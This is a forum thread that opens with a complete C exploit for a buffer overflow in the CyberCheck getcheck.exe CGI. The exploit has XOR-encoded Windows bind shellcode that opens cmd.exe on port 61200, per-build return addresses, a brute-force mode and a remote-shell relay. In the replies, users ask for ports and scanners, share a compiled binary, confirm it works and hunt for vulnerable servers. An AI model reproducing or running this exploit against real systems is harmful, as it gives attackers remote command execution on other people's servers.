Forums: Cybercheck Buffer Overflow Exploit By Drg4njubas - Forums


Cybercheck Buffer Overflow Exploit By Drg4njubas

#1 User is offline   cyrixx 


Posted 30 January 2004 - 05:13 AM

/* 
    _       ___ _ _         _       _               
  __| |_ _ / __| | | _ _   (_)_   _| |__   __ _ ___ 
/ _` | '_| (_ |_   _| '   | | || | '_ / _` (_-< 
__,_|_|   ___| |_||_||_|/ |_,_|_.__/__,_/__/ 
                        |__/   Presents...       

Cybercheck Buffer Overflow Exploit 

CyberCheck is a subsystem of handling business-to-business transactions 
involving the electronic document interchange for the clients registered 
in CyberPlat. Learn more on www.cyberplat.com 

Details: 
When a request uses an invalid method, getcheck.exe logs it with an unbounded 
sprintf(buffer,"CGI_CheckEnvironment: Invalid REQUEST_METHOD=%s.", ...). The 
method string is attacker-controlled, so an overlong method overruns the buffer. 

Vulnerability discovered by drG4njubas of m00. 
Contacts: drG4njubas@bk.ru, http://m00.void.ru 

Thanks to d4rkgr3y for porting to linux. 

*/ 




#include <windows.h> 
#include <winsock.h> 
#include <winbase.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#pragma comment (lib,"wsock32") 

void usage();               /* prints the syntax help and the numbered target table */
void have_fun(SOCKET sock); /* relays the local console to the remote shell socket */

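/*
 * Return addresses the author published for each supported build.  The
 * selected value is written at offset 2019 of the request (just before the
 * shellcode) and overwrites the saved return address of the frame that the
 * logging sprintf() overruns.  Each entry only applies to the exact Windows
 * version, service pack and locale it names; presumably each is a
 * jump-to-register location in a system DLL of that build, but that is not
 * verifiable from this file.  The table ends with a NULL platform name, which
 * is the sentinel usage() and main() walk to.
 */
struct target {
    const char *platform;   /* human-readable build name shown by usage() */
    DWORD retaddr;          /* 32-bit address written into the overflow */
};

static const struct target targets[] = {
    {"Windows 2k sp4 eng", 0x7c4fedbb},
    {"Windows 2k sp3 rus", 0x77E822EA},
    {"Windows xp sp1 rus", 0x77e626ba},
    {"Windows xp sp0 rus", 0x77f5801c},
    {"Windows nt sp6 rus", 0x77f32935},
    {NULL, 0}               /* sentinel: end of table */
};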


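/*
 * Generic win32 bind shellcode by the original author (binds cmd.exe to
 * port 61200).  As posted to the forum every backslash had been stripped
 * ("x90x90..."), which turned the array into 1800 bytes of ASCII; the \x
 * escapes are restored here so that sizeof(shellcode) - 1 is the real
 * 600-byte payload length that main() relies on.
 *
 * Reading the opcode bytes: the first instructions are a short decoder that
 * XORs every following byte with 0xBB until it finds the trailing "m00!"
 * marker (the last four bytes below).  XOR-decoding the body with 0xBB
 * yields, among others, the strings "GetProcAddress", "LoadLibraryA",
 * "ws2_32", "WSAStartup", "bind", "listen", "accept" and "cmd", and the
 * port appears as 0xEF10 == 61200.  Nothing in the payload was changed.
 */
char shellcode[]=
"\x90\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\xBB\x40\x81\x38\x6D"
"\x30\x30\x21\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\x52\xD7\xBA"
"\xBB\xBB\xE6\xEE\x8A\x60\xDF\x30\xB8\xFB\x28\x30\xF8\x44\xFB"
"\xCE\x42\x30\xE8\xB8\xDD\x8A\x69\xDD\x03\xBB\xAB\xDD\x3A\x81"
"\xF6\xE1\xCF\xBC\x92\x79\x52\x49\x44\x44\x44\x32\x68\x30\xC1"
"\x87\xBA\x6C\xB8\xE4\xC3\x30\xF0\xA3\x30\xC8\x9B\x30\xC0\x9F"
"\xBA\x6D\xBA\x6C\x47\x16\xBA\x6B\x2D\x3C\x46\xEA\x8A\x72\x3B"
"\x7A\xB4\x48\x1D\xC9\xB1\x2D\xE2\x3C\x46\xCF\xA9\xFC\xFC\x59"
"\x5D\x05\xB4\xBB\xBB\xBB\x92\x75\x92\x4C\x52\x53\x44\x44\x44"
"\x8A\x7B\xDD\x30\xBC\x7A\x5B\xB9\x30\xC8\xA7\xBA\x6D\xBA\x7D"
"\x16\xBA\x6B\x32\x7D\x32\x6C\xE6\xEC\x36\x26\xB4\xBB\xBB\xBB"
"\xE8\xEC\x44\x6D\x36\x26\xE8\xBB\xBB\xBB\xE8\x44\x6B\x32\x7C"
"\x36\x3E\xE1\xBB\xBB\xBB\xEB\xEC\x44\x6D\x36\x36\x2C\xBB\xBB"
"\xBB\xEA\xD3\xB9\xBB\xBB\xBB\x44\x6B\x36\x26\xDE\xBB\xBB\xBB"
"\xE8\xEC\x44\x6D\x8A\x72\xEA\xEA\xEA\xEA\xD3\xBA\xBB\xBB\xBB"
"\xD3\xB9\xBB\xBB\xBB\x44\x6B\x32\x78\x36\x3E\xCB\xBB\xBB\xBB"
"\xEB\xEC\x44\x6D\xD3\xAB\xBB\xBB\xBB\x36\x36\x38\xBB\xBB\xBB"
"\xEA\xE8\x44\x6B\x36\x3E\xCE\xBB\xBB\xBB\xEB\xEC\x44\x6D\xD3"
"\xBA\xBB\xBB\xBB\xE8\x44\x6B\x36\x3E\xC7\xBB\xBB\xBB\xEB\xEC"
"\x44\x6D\x8A\x72\xEA\xEA\xE8\x44\x6B\xE4\xEB\x36\x26\xFC\xBB"
"\xBB\xBB\xE8\xEC\x44\x6D\xD3\x44\xBB\xBB\xBB\xD3\xFB\xBB\xBB"
"\xBB\x44\x6B\x32\x78\x36\x36\x93\xBB\xBB\xBB\xEA\xEC\x44\x6D"
"\xE8\x44\x6B\xE3\x32\xF8\xFB\x32\xF8\x87\x32\xF8\x83\x7C\xF8"
"\x97\xBA\xBA\xBB\xBB\x36\x3E\x83\xBB\xBB\xBB\xEB\xEC\x44\x6D"
"\xE8\xE8\x8A\x72\xEA\xEA\xEA\xD3\xBA\xBB\xBB\xBB\xEA\xEA\x36"
"\x26\x04\xBB\xBB\xBB\xE8\xEA\x44\x6B\x36\x3E\xA7\xBB\xBB\xBB"
"\xEB\xEC\x44\x6D\x44\x6B\x53\x34\x45\x44\x44\xFC\xDE\xCF\xEB"
"\xC9\xD4\xD8\xFA\xDF\xDF\xC9\xDE\xC8\xC8\xBB\xF7\xD4\xDA\xDF"
"\xF7\xD2\xD9\xC9\xDA\xC9\xC2\xFA\xBB\xFE\xC3\xD2\xCF\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xBB\xFC\xDE\xCF\xE8\xCF\xDA\xC9\xCF\xCE"
"\xCB\xF2\xD5\xDD\xD4\xFA\xBB\xF8\xC9\xDE\xDA\xCF\xDE\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xFA\xBB\xFC\xD7\xD4\xD9\xDA\xD7\xFA\xD7"
"\xD7\xD4\xD8\xBB\xCC\xC8\x89\xE4\x88\x89\xBB\xEC\xE8\xFA\xE8"
"\xCF\xDA\xC9\xCF\xCE\xCB\xBB\xEC\xE8\xFA\xE8\xD4\xD8\xD0\xDE"
"\xCF\xFA\xBB\xD9\xD2\xD5\xDF\xBB\xD7\xD2\xC8\xCF\xDE\xD5\xBB"
"\xDA\xD8\xD8\xDE\xCB\xCF\xBB\xB9\xBB\x54\xAB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBA\xBB\xBB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xD8\xD6\xDF\xBB\x6D\x30\x30\x21";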

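/* Request-target that follows the oversized method token.  URI[0] is the
 * separating space and must stay; main() may overwrite the rest from the
 * /u option, so the array is sized to hold that copy plus a terminator. */
char URI[255] = " /cgi-bin/getcheck.exe";

/* Rest of the request line plus one header.  The escapes were lost in the
 * forum paste ("rn"); restored so the server sees a real CRLF.  main()
 * appends the "Host:" header and the blank line that ends the request. */
char request[] = " HTTP/1.1\r\nAccept: */*\r\n";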


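/* Layout of the oversized REQUEST_METHOD token the server hands to the
 * logging sprintf().  The offsets are the original author's: 2019 filler
 * bytes, then the 4-byte return address, then shellcode[]. */
enum {
    PAD_LEN    = 2019,         /* filler before the overwritten return address */
    RET_OFF    = PAD_LEN,      /* offset of the 4-byte return address          */
    SC_OFF     = PAD_LEN + 4,  /* offset of shellcode[] in the token           */
    SHELL_PORT = 61200         /* port the shellcode binds (see shellcode[])   */
};

/* Everything one delivery attempt needs; filled once in main(). */
struct attempt {
    SOCKADDR_IN target;     /* the web server */
    SOCKADDR_IN shell;      /* same host, SHELL_PORT */
    char *payload;          /* exploit buffer; bytes at RET_OFF change per try */
    int payload_len;
    const char *host_hdr;   /* "Host: <name>\r\n\r\n", terminates the request */
};

/* Non-zero when the 4 little-endian bytes of ret survive an HTTP request
 * line: a space or LF would end the method token early and a NUL would end
 * the C string the server builds from it.  CR is not rejected, matching the
 * original check. */
static int ret_is_sendable(DWORD ret)
{
    unsigned char b[4];
    int k;

    memcpy(b, &ret, sizeof b);
    for (k = 0; k < 4; k++) {
        if (b[k] == 0x00 || b[k] == 0x0A || b[k] == 0x20)
            return 0;
    }
    return 1;
}

/* Send all len bytes of data; -1 on error or a closed peer.  send() may
 * write less than asked, so loop until everything is out. */
static int send_all(SOCKET s, const char *data, int len)
{
    int done = 0;

    while (done < len) {
        int n = send(s, data + done, len - done, 0);
        if (n == SOCKET_ERROR || n == 0)
            return -1;
        done += n;
    }
    return 0;
}

/* Store the first IPv4 address of hostname in *out; -1 if it cannot be
 * resolved or is not a 4-byte address.  gethostbyname() is IPv4-only, but
 * the copy into the 4-byte field is bounded by the check, not by trust. */
static int resolve_ipv4(const char *hostname, struct in_addr *out)
{
    HOSTENT *he = gethostbyname(hostname);

    if (he == NULL || he->h_addr_list[0] == NULL)
        return -1;
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof *out)
        return -1;
    memcpy(out, he->h_addr_list[0], sizeof *out);
    return 0;
}

/* Deliver the payload once with the given return address and probe the bind
 * shell port.  Returns 1 when a shell answered (the session has already been
 * run through have_fun()), 0 when it did not, -1 when the web server could
 * not be connected to at all. */
static int try_ret(const struct attempt *a, DWORD ret)
{
    SOCKET sock, shell;
    int got_shell = 0;

    memcpy(a->payload + RET_OFF, &ret, 4);  /* DWORD is 4 bytes, little-endian */

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
        return -1;
    if (connect(sock, (const struct sockaddr *)&a->target, sizeof a->target) != 0) {
        closesocket(sock);
        return -1;
    }

    /* One request: "<payload><URI> HTTP/1.1", the Accept header, then the
     * Host header and blank line.  The payload is what the server sees as
     * REQUEST_METHOD. */
    if (send_all(sock, a->payload, a->payload_len) != 0 ||
        send_all(sock, URI, (int)strlen(URI)) != 0 ||
        send_all(sock, request, (int)sizeof(request) - 1) != 0 ||
        send_all(sock, a->host_hdr, (int)strlen(a->host_hdr)) != 0) {
        closesocket(sock);
        return 0;
    }
    closesocket(sock);

    /* Fresh socket per probe: a socket whose connect() failed is not
     * guaranteed reusable, and the original reused one for the whole run.
     * NOTE(review): there is no delay before the probe; it can race the
     * shellcode's listen() and report a miss on a successful hit — confirm
     * against a live target before trusting a refused connect. */
    shell = socket(AF_INET, SOCK_STREAM, 0);
    if (shell == INVALID_SOCKET)
        return 0;
    if (connect(shell, (const struct sockaddr *)&a->shell, sizeof a->shell) == 0) {
        printf("[+]Congratulations!!! You've got shell;D\n\n");
        have_fun(shell);
        got_shell = 1;
    }
    closesocket(shell);
    return got_shell;
}

/*
 * Entry point.  argv: <host> <port> [/u[:]uri] [/t[:]num] [/b start end].
 * Builds the oversized method token, delivers it once per candidate return
 * address (one for /t, an inclusive range for /b) and drops into have_fun()
 * when the bind shell answers.  Returns 0 on normal completion, 1 on a
 * usage or setup error.  The addresses in targets[] only apply to the exact
 * Windows builds listed there.
 */
int main(int argc, char **argv)
{
    WSADATA wsaData;
    struct attempt a;
    char exploit[SC_OFF + sizeof(shellcode) - 1];
    char host[255];
    char *uri = NULL, *opt;
    unsigned long port;
    int i, t = 0, ntargets, bruteforce = 0, n;
    DWORD ret, start = 0, end = 0;

    printf("************************************************\n");
    printf("Cybercheck buffer overflow exploit by drG4njubas\n");
    printf("************************************************\n\n");

    if (argc < 3) {
        usage();
        return 1;
    }

    /* Options after <host> <port>.  The colon is optional ("/t2" works),
     * which is what the usage() example relies on. */
    for (i = 3; i < argc; i++) {
        if (strncmp(argv[i], "/u", 2) == 0) {
            opt = argv[i] + 2;
            uri = (*opt == ':') ? opt + 1 : opt;
        } else if (strncmp(argv[i], "/t", 2) == 0) {
            opt = argv[i] + 2;
            t = atoi((*opt == ':') ? opt + 1 : opt);
        } else if (strncmp(argv[i], "/b", 2) == 0 && i + 2 < argc) {
            start = strtoul(argv[i + 1], NULL, 0);
            end = strtoul(argv[i + 2], NULL, 0);
            i += 2;
            bruteforce = 1;
        }
    }

    /* URI[0] is the space between the method token and the request-target;
     * keep it, and terminate explicitly because strncpy() will not when the
     * source fills the buffer (the original could leave URI unterminated
     * and then strlen() it). */
    if (uri != NULL) {
        strncpy(URI + 1, uri, sizeof(URI) - 2);
        URI[sizeof(URI) - 1] = '\0';
    }

    port = strtoul(argv[2], NULL, 10);
    if (port == 0 || port > 65535) {
        printf("Bad port number.\n");
        return 1;
    }

    ntargets = 0;
    while (targets[ntargets].platform != NULL)
        ntargets++;
    if (!bruteforce) {
        /* atoi() returns negatives too; only t >= count was rejected before */
        if (t < 0 || t >= ntargets) {
            printf("Bad target number.\n");
            return 1;
        }
        start = end = targets[t].retaddr;
    } else if (start > end) {
        printf("Bad bruteforce range.\n");
        return 1;
    }

    /* Token: 'a' x PAD_LEN | ret (written per attempt) | shellcode */
    memset(exploit, 'a', PAD_LEN);
    memcpy(exploit + SC_OFF, shellcode, sizeof(shellcode) - 1);

    /* Refuse rather than truncate: a cut-off "\r\n\r\n" would leave the
     * request unterminated, and _snprintf() does not NUL-terminate on
     * overflow, so the later strlen() would run off the buffer. */
    n = _snprintf(host, sizeof host, "Host: %s\r\n\r\n", argv[1]);
    if (n < 0 || (size_t)n >= sizeof host) {
        printf("[-]Host name too long\n");
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("[-]WSAStartup failed\n");
        return 1;
    }

    memset(&a, 0, sizeof a);
    a.payload = exploit;
    a.payload_len = (int)sizeof exploit;
    a.host_hdr = host;

    printf("[+]Resolving %s\n", argv[1]);
    if (resolve_ipv4(argv[1], &a.target.sin_addr) != 0) {
        printf("[-]Can not resolve host name\n");
        WSACleanup();
        return 1;
    }
    a.shell.sin_addr = a.target.sin_addr;
    a.target.sin_family = AF_INET;
    a.shell.sin_family = AF_INET;
    a.target.sin_port = htons((unsigned short)port);
    a.shell.sin_port = htons(SHELL_PORT);

    if (bruteforce)
        printf("[+]Starting bruteforce from %08lX to %08lX\n",
               (unsigned long)start, (unsigned long)end);

    /* Inclusive range with the exit test at the bottom, so end == 0xFFFFFFFF
     * cannot make ret wrap and loop forever; start/end stay unsigned where
     * the original compared them as int. */
    for (ret = start; ; ret++) {
        if (!ret_is_sendable(ret)) {
            /* Checked before any connection is opened: the original connected
             * first and leaked that socket on every rejected address. */
            printf("   - Ret %08lX can not be used!\n", (unsigned long)ret);
        } else {
            int rc;

            if (bruteforce) {
                printf("   - Trying ret 0x%08lX\n", (unsigned long)ret);
            } else {
                printf("[+]Connecting to %s\n", argv[1]);
                printf("[+]Using ret for %s\n", targets[t].platform);
                printf("[+]Sending exploit\n");
            }
            rc = try_ret(&a, ret);
            if (rc < 0) {
                printf("[-]Connection failed\n");
                WSACleanup();
                return 1;
            }
            if (rc > 0)
                break;
            if (!bruteforce)
                printf("[-]Exploitation failed;(\n");
        }
        if (ret == end)
            break;
    }

    WSACleanup();
    return 0;
}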

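/*
 * Print the command-line syntax, the numbered target table (index into
 * targets[], ended by its NULL sentinel) and two examples to stdout.
 * The "\n" escapes and the quotes around TARGETS were lost in the forum
 * paste and are restored here; the text itself is unchanged.
 */
void usage(void)
{
    int k;

    printf("USAGE: \n");
    printf("m00-cybercheck.exe <host> <port> [/u:Request-URI] [/t:num] [/b start end] \n");
    printf("<host>   - hostname(example: www.cyberplat.ru)\n");
    printf("<port>   - portnumber(example: 80)\n");
    printf("[/u:uri] - request-uri(default: /cgi-bin/getcheck.exe)\n");
    printf("[/t:num] - target number(see \"TARGETS\")\n");
    printf("[/b start end] - bruteforce mode(don't use it with /t key)\n\n");

    printf("TARGETS:\n");
    for (k = 0; targets[k].platform != NULL; k++)
        printf("%d - %s\n", k, targets[k].platform);

    printf("\nEXAMPLE:\n");
    /* "/t2" without a colon is accepted by main()'s option parser */
    printf("m00-cybercheck.exe www.host.ru 80 /u:/scripts/getcheck.exe /t2\n");
    printf("m00-cybercheck.exe www.host.ru 80 /b 0x11223344 0x55667788\n\n");
}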


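/*
 * Relay between the local console and the remote cmd.exe the shellcode
 * bound: bytes from the socket are written to stdout, console keystrokes
 * are sent to the socket.  Returns when the socket errors out, when the
 * peer closes the connection, or when a console call fails.  The caller
 * owns sock and closes it.
 */
void have_fun(SOCKET sock)
{
    char buf[1024];
    int sel, got;
    DWORD nread, nwritten;   /* the console APIs take LPDWORD, not int* */
    fd_set fdread;
    TIMEVAL tv;
    HANDLE std_in, std_out;
    INPUT_RECORD rec;

    std_in = GetStdHandle(STD_INPUT_HANDLE);
    std_out = GetStdHandle(STD_OUTPUT_HANDLE);
    SetConsoleMode(std_in, ENABLE_ECHO_INPUT | ENABLE_PROCESSED_INPUT);

    do {
        /* 1 s timeout so console input is polled even while the peer is
         * silent; Winsock ignores select()'s first argument. */
        tv.tv_sec = 1;
        tv.tv_usec = 0;
        FD_ZERO(&fdread);
        FD_SET(sock, &fdread);
        sel = select(0, &fdread, NULL, NULL, &tv);
        if (sel > 0) {
            got = recv(sock, buf, sizeof buf, 0);
            if (got == SOCKET_ERROR)
                return;
            /* 0 means the peer closed the connection.  The original kept
             * looping here, and select() then reported readable forever. */
            if (got == 0)
                return;
            WriteConsole(std_out, buf, (DWORD)got, &nwritten, NULL);
        }

        /* Only read when something is queued, so ReadConsole() cannot block
         * the relay.  NOTE(review): a queued non-key event (mouse, focus)
         * would still make ReadConsole() wait — confirm whether that matters. */
        nread = 0;
        if (!PeekConsoleInput(std_in, &rec, 1, &nread))
            return;
        if (nread > 0) {
            if (!ReadConsole(std_in, buf, sizeof buf, &nread, NULL))
                return;
            if (send(sock, buf, (int)nread, 0) == SOCKET_ERROR)
                return;
        }
    } while (sel != SOCKET_ERROR);
}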


#2 User is offline   nolimit 


Posted 30 January 2004 - 10:50 AM

lots of compile errors, don't have time atm to go through them, if someone else does.
some lines i found that didn't smell right
for(i = 0; i<2019; i++)exploit = 'a';

and

while(targets.platform)i++;
guessing it should be targets[i].platform.
I'll try it some more later, gotta get back to work

#3 User is offline   x1` 


Posted 30 January 2004 - 10:57 AM

port 80 then ?

#4 User is offline   nolimit 


Posted 30 January 2004 - 11:08 AM

depends on the HTTP server , but of course most are port 80, so yes.

#5 User is offline   fre4k 


Posted 30 January 2004 - 12:14 PM

are they any vuln scanner for it B)

*sry for my bad english*

-fre4k

#6 User is offline   mortello 


Posted 30 January 2004 - 01:04 PM

Damn guys, this just got out of nowhere and you already ask for what port to scan (this is a bit stupid of a question) and that other guy asks for the scanner....not everything falls off trees....just relax and wait if you don't know how to compile....

Edit : Can't compile this one, I'll wait for the error-free code

#7 User is offline   x1` 


Posted 30 January 2004 - 01:06 PM

i cant compile it :( what compiler to use?

#8 User is offline   fre4k 


Posted 30 January 2004 - 01:22 PM

hey can compile this one! anybody need?

#9 User is offline   x1` 


Posted 30 January 2004 - 01:29 PM

yep i do can u post it in downloads section , and proabably other people need it

#10 User is offline   fre4k 


Posted 30 January 2004 - 01:40 PM

Here it is :D

www.wordi.de/Download/crec.rar


have fun ^^

-fre4k


PLZ notice if this works ^^ THX

#11 User is offline   x1` 


Posted 30 January 2004 - 01:49 PM

that link dosent work please fix or just attact the file to downloads section

#12 User is offline   fre4k 


Posted 30 January 2004 - 01:53 PM

copy This:

www.wordi.de/Download/crec.rar

in your i-net-explorer and it works ^^ ka why?! :D

#13 User is offline   x1` 


Posted 30 January 2004 - 01:58 PM

oh sorry about that my mistake thx for the compiled version

#14 User is offline   nolimit 


Posted 30 January 2004 - 02:02 PM

╔▐┌╧▐δ╔╘╪▐╚╚╗ⁿ╫╘┘┌╫╫╫╘╪╗╠╚Σ╗∞ΦΦ╧┌╔╧╬╦╗∞ΦΦ╘╪╨▐╧╗┘╥╒▀╗╫╥╚╧▐╒╗┌╪╪▐╦╧╗╣╗T╗
╗╗╗╗╗╗╗╗╗╗╗║╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╗╪╓▀╗m00! /cgi-bin/getcheck.exe HTTP/1.1
Accept: */*
Host: 127.0.0.1
 sent 0, rcvd 2688

Works, nice job dude. Didn't have to patience to go through it atm.

#15 User is offline   phaeton 


Posted 30 January 2004 - 02:13 PM

yep, the app works, just trying to scan for links to getcheck.exe (if that's the name of the default service) but can't find any yet.
